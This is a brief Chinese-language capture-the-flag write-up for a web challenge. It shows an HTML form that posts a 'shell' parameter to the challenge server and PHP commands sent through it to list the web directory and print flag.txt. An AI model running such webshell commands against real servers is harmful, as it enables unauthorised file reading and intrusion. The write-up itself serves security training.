https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5070

版本一

题解:修改HTML代码提交一个shell的变量

变量值是webshell命令

​​​​​​​<form action="http://111.198.29.45:36317/index.php" method="post">
    <input type="text" name="shell">
    <input type="submit" value="提交">
</form>

提交命令

print_r(scandir(getcwd()));

在网站目录下发现了flag.txt

 提交命令

print_r(show_source('flag.txt'));